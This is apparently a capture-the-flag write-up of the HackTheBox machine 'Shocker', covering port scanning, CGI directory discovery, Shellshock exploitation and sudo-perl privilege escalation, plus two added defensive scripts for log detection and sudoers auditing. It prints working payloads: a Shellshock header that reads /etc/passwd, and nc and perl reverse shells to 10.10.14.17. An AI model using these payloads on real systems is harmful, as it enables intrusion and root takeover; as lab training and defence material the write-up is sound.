HackTheBox: Shocker [OSCP Prep]

- OS: Linux
- Difficulty: Easy
- Release: 30 Sep 2017
- IP: 10.10.10.56
- Box Creator: mrb3n
Hello there guys. Welcome to my 5th post on the TJnull OSCP Prep Series. Today we're going to be discussing Shocker from HackTheBox.
Let's begin with a full Nmap port scan to see which ports are open. I've used Rustscan because it returns Nmap results faster:
$ rustscan -a 10.10.10.56 -r 1-65535 -b 65 -- -sV -sC -Pn
PORT STATE SERVICE REASON VERSION
80/tcp open http syn-ack Apache httpd 2.4.18 ((Ubuntu))
| http-methods:
|_ Supported Methods: POST OPTIONS GET HEAD
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
2222/tcp open ssh syn-ack OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 c4:f8:ad:e8:f8:04:77:de:cf:15:0d:63:0a:18:7e:49 (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQD8ArTOHWzqhwcyAZWc2CmxfLmVVTwfLZf0zhCBREGCpS2WC3NhAKQ2zefCHCU8XTC8hY9ta5ocU+p7S52OGHlaG7HuA5Xlnihl1INNsMX7gpNcfQEYnyby+hjHWPLo4++fAyO/lB8NammyA13MzvJy8pxvB9gmCJhVPaFzG5yX6Ly8OIsvVDk+qVa5eLCIua1E7WGACUlmkEGljDvzOaBdogMQZ8TGBTqNZbShnFH1WsUxBtJNRtYfeeGjztKTQqqj4WD5atU8dqV/iwmTylpE7wdHZ+38ckuYL9dmUPLh4Li2ZgdY6XniVOBGthY5a2uJ2OFp2xe1WS9KvbYjJ/tH
| 256 22:8f:b1:97:bf:0f:17:08:fc:7e:2c:8f:e9:77:3a:48 (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBPiFJd2F35NPKIQxKMHrgPzVzoNHOJtTtM+zlwVfxzvcXPFFuQrOL7X6Mi9YQF9QRVJpwtmV9KAtWltmk3qm4oc=
| 256 e6:ac:27:a3:b5:a9:f1:12:3c:34:a5:5d:5b:eb:3d:e9 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIC/RjKhT/2YPlCgFQLx+gOXhC6W3A3raTzjlXQMT8Msk
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
NSE: Script Post-scanning.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 19:41
Completed NSE at 19:41, 0.00s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 19:41
Completed NSE at 19:41, 0.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 19:41
Completed NSE at 19:41, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 13.05 seconds
Usually the SSH service runs on port 22, but here it runs on port 2222. This can happen for a number of reasons:
- The sysadmin is trying to hide the SSH service from detection by common Nmap scans.
- It might be a backdoor that another attacker has set up.
Let's keep SSH in the back of our mind for now and move on to HTTP. I started directory busting with dirsearch:
$ dirsearch -u "http://10.10.10.56/"
Target: http://10.10.10.56/
[22:31:54] Starting:
[22:32:01] 403 - 297B - /.ht_wsr.txt
[22:32:02] 403 - 300B - /.htaccess_orig
[22:32:02] 403 - 298B - /.htaccess_sc
[22:32:02] 403 - 301B - /.htaccess_extra
[22:32:02] 403 - 298B - /.htaccessBAK
[22:32:02] 403 - 300B - /.htaccess.orig
[22:32:02] 403 - 300B - /.htaccess.bak1
[22:32:02] 403 - 298B - /.htaccessOLD
[22:32:02] 403 - 302B - /.htaccess.sample
[22:32:02] 403 - 299B - /.htaccessOLD2
[22:32:02] 403 - 290B - /.htm
[22:32:02] 403 - 291B - /.html
[22:32:02] 403 - 300B - /.htaccess.save
[22:32:02] 403 - 296B - /.htpasswds
[22:32:02] 403 - 297B - /.httr-oauth
[22:32:02] 403 - 300B - /.htpasswd_test
[22:32:46] 403 - 294B - /cgi-bin/
[22:33:03] 200 - 137B - /index.html
[22:33:26] 403 - 299B - /server-status
[22:33:26] 403 - 300B - /server-status/
Task Completed
Most of the results are 403 (Forbidden), but among them /cgi-bin/ stands out to me.
The /cgi-bin directory is where CGI scripts are placed. CGI scripts are external executable programs that the web server runs to provide extended functionality.
Let's try to hunt down the CGI scripts that live in the /cgi-bin directory:
$ dirsearch -u http://10.10.10.56/cgi-bin -e php,py,js,sh
Target: http://10.10.10.56/cgi-bin/
[22:57:54] Starting:
[22:58:00] 403 - 305B - /cgi-bin/.ht_wsr.txt
[22:58:00] 403 - 308B - /cgi-bin/.htaccess.bak1
[22:58:00] 403 - 308B - /cgi-bin/.htaccess.orig
[22:58:00] 403 - 308B - /cgi-bin/.htaccess.save
[22:58:00] 403 - 310B - /cgi-bin/.htaccess.sample
[22:58:00] 403 - 309B - /cgi-bin/.htaccess_extra
[22:58:00] 403 - 306B - /cgi-bin/.htaccess_sc
[22:58:00] 403 - 307B - /cgi-bin/.htaccessOLD2
[22:58:00] 403 - 308B - /cgi-bin/.htaccess_orig
[22:58:00] 403 - 299B - /cgi-bin/.html
[22:58:00] 403 - 306B - /cgi-bin/.htaccessOLD
[22:58:00] 403 - 298B - /cgi-bin/.htm
[22:58:00] 403 - 306B - /cgi-bin/.htaccessBAK
[22:58:01] 403 - 308B - /cgi-bin/.htpasswd_test
[22:58:01] 403 - 304B - /cgi-bin/.htpasswds
[22:58:01] 403 - 305B - /cgi-bin/.httr-oauth
[22:59:01] 200 - 118B - /cgi-bin/user.sh
Task Completed
/cgi-bin/user.sh looks interesting to us. This is what we get when requesting the script:
A .sh CGI script is executed by bash, and old versions of bash are vulnerable to Shellshock: when bash imports a function definition from an environment variable, it also executes any commands that follow the definition. Let's try to exploit Shellshock.
Exploitation
Payload (Dump /etc/passwd):
() { :; }; echo; /bin/bash -c 'cat /etc/passwd'
The idea is to inject the payload through an HTTP header. Apache passes request headers to CGI programs as environment variables, so a vulnerable bash parses the header value as a function definition and runs the trailing commands. In this case, we inject the payload into the User-Agent header:
curl http://10.10.10.56/cgi-bin/user.sh -H "User-Agent: () { :; }; echo; /bin/bash -c 'cat /etc/passwd'"

Now let's get a shell, shall we:
curl http://10.10.10.56/cgi-bin/user.sh -H "User-Agent: () { :; }; echo; /bin/bash -c 'rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.17 1337 >/tmp/f'"
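From the defender's side, the same injection leaves a distinctive marker in the web server logs. The following is an added example (not code from the original post): it parses Apache's default "combined" log format, which records Referer and User-Agent, and flags any request whose headers carry the bash function-definition prefix that every Shellshock payload starts with. The log lines are constructed for illustration.

```python
import re

# Apache "combined" format: host ident user [time] "request" status bytes "referer" "user-agent"
LOG_RE = re.compile(
    r'^(?P<host>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<agent>[^"]*)"$'
)

# A Shellshock payload begins with an exported bash function definition, "() {".
# Spacing between the tokens is optional, so any amount of whitespace is allowed.
SHELLSHOCK_RE = re.compile(r'\(\)\s*\{')


def is_shellshock_payload(value):
    """True if a header value contains the bash function-definition marker."""
    return SHELLSHOCK_RE.search(value) is not None


def scan_log(lines):
    """Return (host, path, header) tuples for requests carrying the marker.

    Every header Apache hands to a CGI program becomes an environment variable,
    so Referer is checked as well as User-Agent.
    """
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # not a combined-format line; skip instead of crashing
        for header in ("referer", "agent"):
            if is_shellshock_payload(m.group(header)):
                hits.append((m.group("host"), m.group("path"), header))
    return hits


# Constructed sample entries (not real traffic); the source address is the
# attacker host used in the write-up.
SAMPLE_LOG = [
    '10.10.14.17 - - [30/Sep/2017:19:41:02 +0000] "GET /cgi-bin/user.sh HTTP/1.1" 200 118 '
    '"-" "() { :; }; echo; /bin/bash -c \'id\'"',
    '10.10.14.17 - - [30/Sep/2017:19:41:05 +0000] "GET /index.html HTTP/1.1" 200 137 '
    '"-" "Mozilla/5.0 (X11; Linux x86_64)"',
    '10.10.14.17 - - [30/Sep/2017:19:41:09 +0000] "GET /cgi-bin/user.sh HTTP/1.1" 200 118 '
    '"(){ :;}; /bin/true" "curl/7.64.1"',
]

if __name__ == "__main__":
    for host, path, header in scan_log(SAMPLE_LOG):
        print(f"ALERT: Shellshock marker in {header} header from {host} -> {path}")
```

Running the script against the constructed entries reports the two /cgi-bin/user.sh requests and ignores the ordinary browser request.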
Post-Exploitation
List the programs the current user is allowed to run with sudo.
Perl can be run as root without being prompted for a password:
sudo -u root perl -e 'use Socket;$i="10.10.14.17";$p=1338;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
The listener on port 1338 receives a reverse shell with root permissions.
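The root path here is a sudoers rule that lets a low-privileged user run an interpreter as root with NOPASSWD. As an added example (not part of the original post), the script below parses sudoers-style user specifications and reports rules that grant a shell-capable program as root without a password. The list of shell-capable programs and the sudoers fragment are assumptions constructed for illustration.

```python
import os
import re

# Programs that can hand an arbitrary shell to whoever runs them as root.
# Illustrative list assumed for this example; extend it from your own policy.
SHELL_CAPABLE = {"perl", "python", "python3", "ruby", "bash", "sh", "vi", "vim", "awk", "find"}

# Sudoers user specification: user host=(runas) [TAG: ...] command[, command...]
RULE_RE = re.compile(r'^(?P<user>\S+)\s+(?P<host>[^=\s]+)\s*=\s*(?:\((?P<runas>[^)]*)\))?\s*(?P<body>.+)$')
TAG_RE = re.compile(r'^(NOPASSWD|PASSWD|SETENV|NOSETENV|NOEXEC|EXEC|LOG_INPUT|LOG_OUTPUT):\s*')


def parse_rule(line):
    """Parse one sudoers user specification; return None for anything else."""
    m = RULE_RE.match(line.strip())
    if not m:
        return None
    body, tags = m.group("body"), set()
    t = TAG_RE.match(body)
    while t:  # tags such as NOPASSWD: may be stacked before the command list
        tags.add(t.group(1))
        body = body[t.end():]
        t = TAG_RE.match(body)
    runas = (m.group("runas") or "root").split(":")[0]  # "(root:root)" -> root; omitted -> root
    return {"user": m.group("user"), "runas": runas, "tags": tags,
            "cmds": [c.strip() for c in body.split(",") if c.strip()]}


def risky_rules(sudoers_text):
    """Return (user, command) pairs: shell-capable program, run as root, no password."""
    findings = []
    for line in sudoers_text.splitlines():
        stripped = line.strip()
        if not stripped or stripped.startswith(("#", "Defaults")):
            continue
        rule = parse_rule(stripped)
        if rule is None or "NOPASSWD" not in rule["tags"] or rule["runas"] not in ("root", "ALL"):
            continue
        for cmd in rule["cmds"]:
            prog = os.path.basename(cmd.split()[0])
            if cmd == "ALL" or prog in SHELL_CAPABLE:
                findings.append((rule["user"], cmd))
    return findings


# Constructed sudoers fragment for illustration (not the box's real file).
SAMPLE_SUDOERS = """
Defaults env_reset
root    ALL=(ALL:ALL) ALL
cgiuser ALL=(root) NOPASSWD: /usr/bin/perl
backup  ALL=(root) NOPASSWD: /usr/bin/rsync
deploy  ALL=(www-data) NOPASSWD: /usr/bin/python3
ops     ALL=(root) /usr/bin/vim
"""

if __name__ == "__main__":
    for user, cmd in risky_rules(SAMPLE_SUDOERS):
        print(f"FINDING: {user} may run {cmd} as root with NOPASSWD")
```

Only the perl rule is reported: rsync is not on the shell-capable list, the python3 rule runs as www-data rather than root, and the vim rule still requires a password.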
I hope you have learned something valuable by reading my write-up. If you like this post, please share it with your fellow hackermates, and if you have any questions or suggestions, please feel free to post them in the comments. I'd love to hear and learn from you.
If you enjoyed this write-up, show me some love by giving me some respect at [email protected]; it helps and motivates me to create content like this for the awesome hacking community. Have a great day, guys. See you in the next post.